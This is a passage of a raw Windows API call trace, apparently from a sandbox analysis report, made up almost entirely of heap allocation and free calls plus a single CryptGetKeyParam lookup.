Flags=0x0, Size=0x10) returned 0x9ba498 [0161.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0161.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0161.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0161.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0161.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0161.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0161.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0161.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0161.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0161.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0161.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0161.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0161.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0161.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0161.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0161.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0161.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0161.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0161.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0161.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0161.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0161.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0161.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0161.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0161.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0161.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0161.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0161.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0161.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0161.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0161.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0161.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0161.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0161.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0161.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0161.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0161.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0161.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0161.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0161.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0161.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0161.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0161.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0161.049] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0161.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0161.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0161.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0161.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0161.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0161.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0161.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0161.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0161.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0161.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0161.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0161.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0161.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0161.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0161.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0161.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0161.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0161.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0161.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0161.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0161.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0161.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0161.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0161.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0161.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0161.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0161.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0161.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0161.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0161.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0161.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0161.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0161.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0161.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0161.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0161.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0161.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0161.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0161.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0161.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0161.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0161.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0161.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d420 [0161.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0161.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0161.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0161.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.051] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0161.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0161.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0161.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0161.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0161.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0161.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0161.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0161.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0161.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0161.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0161.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0161.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0161.052] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c27a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0161.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0161.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0161.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0161.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0161.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0161.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0161.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0161.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0161.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0161.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0161.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0161.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0161.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0161.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0161.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0161.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0161.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0161.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0161.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0161.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0161.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0161.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0161.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0161.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0161.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0161.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0161.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0161.055] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0161.055] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, 